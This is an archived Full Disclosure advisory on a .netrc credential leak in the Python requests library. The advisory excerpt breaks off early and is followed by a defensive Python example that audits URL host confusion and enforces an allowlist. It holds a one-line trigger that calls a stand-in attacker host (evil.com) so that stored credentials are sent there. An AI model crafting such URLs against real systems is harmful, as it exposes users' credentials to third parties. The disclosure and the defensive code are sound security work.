Netrc credential leak in PSF requests library
Full Disclosure
mailing list archives
From: Juho Forsén via Fulldisclosure <fulldisclosure () seclists org>
Date: Sat, 31 May 2025 06:30:50 +0000
The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc
credentials to third parties due to incorrect URL processing under specific conditions.
Issuing the following API call triggers the vulnerability:
requests.get('http://example.com:@evil.com/')
Assuming .netrc credentials are configured for ...
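The host confusion behind the call above, as an added example (not code from the advisory or from requests). It assumes, for illustration only, that the credential lookup takes everything before the first ':' in the netloc as the host, and compares that with the host the connection actually goes to; all function names are hypothetical.

```python
from urllib.parse import urlsplit

# Constructed sample URLs; the first is the call shown in the advisory.
SAMPLES = [
    "http://example.com:@evil.com/",
    "http://example.com:8080/api",
    "https://example.com/",
]

def naive_lookup_host(url: str) -> str:
    """Assumed flawed derivation: text before the first ':' in the netloc."""
    return urlsplit(url).netloc.split(":")[0].lower()

def connection_host(url: str) -> str:
    """Host the client connects to, with userinfo and port stripped."""
    return (urlsplit(url).hostname or "").lower()

def has_userinfo(url: str) -> bool:
    """True when the authority part carries a 'user[:password]@' prefix."""
    return "@" in urlsplit(url).netloc

def audit(url: str) -> dict:
    """Report whether the credential-lookup host differs from the real target."""
    lookup, target = naive_lookup_host(url), connection_host(url)
    return {
        "url": url,
        "lookup_host": lookup,
        "connects_to": target,
        "userinfo": has_userinfo(url),
        "mismatch": lookup != target,
    }

def require_plain_host(url: str, allowed_hosts: set) -> str:
    """Guard for URLs built from untrusted input before an HTTP client sees them."""
    if has_userinfo(url):
        raise ValueError("userinfo in URL authority is not accepted")
    host = connection_host(url)
    if host not in allowed_hosts:
        raise ValueError("host %r is not on the allowlist" % host)
    return url

if __name__ == "__main__":
    for sample in SAMPLES:
        print(audit(sample))
```

In requests itself, setting trust_env = False on a Session turns off .netrc lookups for that session.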